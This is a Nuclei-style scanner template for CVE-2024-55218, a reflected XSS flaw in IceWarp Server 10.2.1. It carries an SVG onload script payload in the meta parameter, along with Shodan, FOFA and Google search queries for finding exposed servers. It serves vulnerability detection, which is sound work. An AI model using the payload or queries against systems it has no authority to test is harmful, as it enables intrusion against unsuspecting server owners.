id: CVE-2024-55218 info: name: IceWarp Server 10.2.1 - Cross-Site Scripting author: s4e-io severity: medium description: | IceWarp Server 10.2.1 is vulnerable to Cross Site Scripting (XSS) via the meta parameter. impact: | Attackers can inject malicious JavaScript through the meta parameter, executing arbitrary code in victim browsers when they visit crafted URLs. remediation: | Update IceWarp Server to a version later than 10.2.1 that addresses the reflected XSS vulnerability. reference: - https://resources.s4e.io/blog/icewarp-server-10-2-1-reflected-xss-vulnerability-cve-2024-55218/ - https://nvd.nist.gov/vuln/detail/CVE-2024-55218 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-55218 cwe-id: CWE-79 epss-score: 0.00508 epss-percentile: 0.66674 metadata: verified: true max-request: 1 vendor: icewarp product: mail_server shodan-query: - http.title:"icewarp server administration" - http.title:"icewarp" - cpe:"cpe:2.3:a:icewarp:mail_server" fofa-query: - title="icewarp server administration" - title="icewarp" google-query: - intitle:"icewarp server administration" - intitle:"icewarp" - powered by icewarp 10.2.1 - powered by icewarp 10.4.4 tags: cve,cve2024,icewarp,xss,vuln http: - method: GET path: - "{{BaseURL}}/?meta=%3Csvg%2Fonload=confirm%28document.domain%29%3E" matchers: - type: dsl dsl: - 'contains_all(body, "", "IceWarp")' - 'contains(header, "text/html")' - 'status_code == 200' condition: and # digest: 4a0a0047304502202f31a79527902657abc6f3ac6767c9066f43d96836f93139d2c9435fc7aebc0902210098019503587d07922445d0d45f26d3bc8632479d3557f07a55889f4ced4a5978:922c64590222798bb761d5b6d8e72950